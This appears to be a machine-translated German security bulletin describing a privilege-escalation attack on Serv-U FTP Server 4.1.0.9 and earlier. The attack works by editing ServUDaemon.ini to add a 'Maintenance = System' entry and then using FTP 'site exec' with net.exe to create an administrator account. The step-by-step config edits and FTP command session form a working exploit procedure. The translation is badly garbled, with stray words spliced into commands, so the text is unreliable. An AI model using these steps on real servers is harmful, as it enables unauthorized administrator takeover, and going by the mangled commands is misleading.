Lokale erhöhte Privilegien: Ja
Remote erhöhte Privilegien: Ja
Verwenden Voraussetzungen: die Serv-U Konfigurationsdatei hat Berechtigungen ändern
Disclaimer: Dies ist nur ein Privileg Eskalation Ideen und Methoden.
1, die betroffene Software
Serv-U FTP Server 4.1.0.9 (und alle früheren Versionen)
Zweitens, dass das betroffene System
Alle Versionen von Microsoft Windows Server 2003
Alle Versionen von Microsoft Windows XP
Alle Versionen von Microsoft Windows 2000
Alle Versionen von Microsoft Windows NT
Drittens schreiben
Serv-U FTP Server zu RhinoSoft produziert einen ftp sServer Software nun weitgehend auf der ganzen Welt eingesetzt. Nachdem ich festgestellt, Serv-U FTP Server-Konfiguration in der Serv-U FTP Server Dateiverzeichnis ServUDaemon.ini-Datei gespeichert. Wenn der lokale Benutzer mit eingeschränkten Rechten oder einem entfernten Angreifer, der eine allgemeine Erlaubnis zum Zugriff auf die Datei und sorgfältig Datei der Inhalt der Struktur ServUDaemon.ini FTP-Prozess kann das System nutzen, um beliebige Befehle mit SYSTEM-Rechten auszuführen hat.
4, Fehleranalyse:
Serv-U FTP Serve setzt den Benutzer-Konfiguration Informationen gespeichert und später ServUDaemon.ini Datei. Ua mit den Rechten des Anwenders auf Information und auf Verzeichnis-Informationen zugreifen. Lokale Benutzer mit eingeschränkten Rechten oder einem remoten Angreifer zu lesen und zu schreiben, so lange wie Serv-U FTP Serve das Dateiverzeichnis, können Sie Dateien in das Verzeichnis ServUDaemon.ini FTP-Prozess der Realisierung des Remote ändern, die lokale Administratorrechte auf FTP beliebige Befehle ausführen. System-Version und nicht unter den Auswirkungen. (Userinfo Wählen Sie "Speicher-und der System-Registry" ohne diesen Defekt betroffen sind)
5, Prüfmethode:
1, der lokalen Test
Angenommen ein lokaler Benutzer mit eingeschränkten Rechten können die Serv-U FTP Serve die Datei-Verzeichnis zu durchsuchen. Finden ServUDaemon.ini Datei. Verwenden Sie den Editor zu öffnen, den allgemeinen Inhalt des Originaldokuments, wie:
[GLOBAL]
Version = 4.1.0.0 / / Serv-U FTP Server-Versionsnummer
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[DOMAINS]
Domain1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0 Datei / / Host-IP-und Domain-Name, Port Bedingungen
[Domain1]
User1 = zihuan | 1 | 0
[USER = zihuan | 1]
Password = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = c: / / können das Verzeichnis
TimeOut = 600
Access1 = C: | RWAMLCDP
Wenn ServUDaemon.in geänderten Datei folgt:
[GLOBAL]
Version = 4.1.0.0
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[DOMAINS]
Domain1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0
[Domain1]
User1 = zihuan | 1 | 0
[USER = zihuan | 1]
Password = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir = c:
TimeOut = 600
Wartung = System-Datei / / Permissions Typ
Access1 = C: | RWAMELCDP
Die oben genannten, mehr als den ursprünglichen Inhalt eines "Maintenance = System" nach der Bearbeitung zu speichern. Dann nutzen Sie die FTP-Login auf Serv-U FTP Server nach der Umsetzung der folgenden Befehl ein:
ftp open ip
Angeschlossen an ip.
220 Serv-U FTP Server v4.1.0.0 für WinSock ready ...
User (ip: (none)): ID-Datei / / user Input-Struktur
331 User name okay, senden Sie bitte vollständige E-Mail-Adresse als Passwort.
Password: Passwort-Datei / / Passwort
230 User angemeldet sind, gehen.
ftp cd winnt Datei / / in dem Verzeichnis Winnt win2k, wenn es WinXP oder Windows Server 2003 soll das Windows-Verzeichnis ist.
250 Directory geändert / WINNT
ftp cd system32 Datei / / in das System32-Verzeichnis
250 Directory geändert / WINNT/system32
ftp quote site exec net.exe Benutzer zihuan ziHUAN / add file / / use-System plus net.exe Dateien des Benutzers.
200 EXEC command successful (TID = 33).
ftp quote site exec net.exe localhost zihuan Administratoren / add file / / zum Super-User Upgrade
Dieser Anstieg im lokalen System, ein Passwort für den zihuan: ziHUAN Super-User. Kann auch direkt quote site exec net.exe Administratoren localhost user / add-Befehl für den aktuellen Benutzer angehoben, um dem Super-User-Gruppe zu gehen. Natürlich können Sie vollstrecken jeden Befehl auf dem System.
Statement:
Bücher nur auf die möglichen Probleme der Sicherheit, des Autors und Hacker X Files magazine diesem Security Bulletin beschrieben ist, keine Gewährleistung oder Zusicherung geben. Da die Ausbreitung der Nutzung der Informationen in diesem Artikel, die aufgrund von direkten oder indirekten Folgen des Verlustes durch den Benutzer selbst verantwortlich ist vorgesehen, übernimmt der Autor keine Verantwortung für diese. Die Autoren haben dieses Security Bulletins und Interpretation revidiert. Für diesen Artikel, reproduziert oder übertragen werden, um die Integrität von diesem Artikel, einschließlich der Copyright-Vermerk und alle anderen Inhalte zu gewährleisten. Berechtigt, ohne den Autor können nicht ändern oder die Änderung des Inhalts dieses Artikels Ankündigung.